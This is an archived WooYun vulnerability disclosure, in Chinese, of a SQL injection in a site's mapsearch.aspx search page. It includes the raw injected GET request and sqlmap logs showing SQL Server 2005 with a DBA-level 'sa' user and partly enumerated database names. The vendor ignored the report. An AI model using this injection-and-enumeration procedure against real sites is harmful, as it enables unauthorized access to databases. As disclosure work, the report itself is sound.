乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-13: 细节已通知厂商并且等待厂商处理中 2015-10-18: 厂商已经主动忽略漏洞,细节向公众公开
rt
1.注入点是个serach页面
GET /map/mapsearch.aspx?lx=&ly=&ux=&uy=&map=0&_flowId=map&keyword=1%27&Submit5=%E6%90%9C++%E7%B4%A2 HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**/Connection: keep-alive
加个单引号出现报错
丢进sqlmap出数据
[15:11:36] [INFO] testing Microsoft SQL Server[15:11:36] [WARNING] it is very important not to stress the network adapter'ndwidth during usage of time-based queries[15:11:41] [INFO] confirming Microsoft SQL Server[15:11:53] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[15:11:53] [INFO] fetching current user[15:11:53] [INFO] retrieved: sacurrent user: 'sa'
[15:26:35] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[15:26:35] [INFO] testing if current user is DBA[15:26:35] [WARNING] time-based comparison needs larger statistical model.g a few dummy requests, please wait..[15:26:46] [WARNING] it is very important not to stress the network adaptendwidth during usage of time-based queries1current user is DBA: 'True'
19个数据库
ndwidth during usage of time-based queries1[15:28:03] [INFO] adjusting time delay to 2 seconds due to good response t9[15:28:09] [INFO] retrieved: db_compus[15:30:08] [INFO] retrieved: db[15:30:57] [CRITICAL] unable to connect to the target url or proxy, sqlmaping to retry the request_connect![15:32:50] [INFO] retrieved: d[15:33:13] [ERROR] invalid character detected. retrying..[15:33:13] [WARNING] increasing time delay to 3 secondsb_[15:33:59] [ERROR] invalid character detected. retrying..[15:33:59] [WARNING] increasing time delay to 4 secondsinspecto[15:37:11] [ERROR] invalid character detected. retrying..[15:37:11] [WARNING] increasing time delay to 5 secondsr[15:37:45] [INFO] retrieved: db_m[15:39:42] [ERROR] invalid character detected. retrying..[15:39:42] [WARNING] increasing time delay to 6 secondsambo[15:41:28] [INFO] retrieved:[15:41:50] [ERROR] invalid character detected. retrying..[15:41:50] [WARNING] increasing time delay to 7 seconds[15:42:16] [ERROR] unable to properly validate last character value ('i').icard[15:43:08] [INFO] retrieved:
icard
危害等级:无影响厂商忽略
忽略时间:2015-10-18 11:34
暂无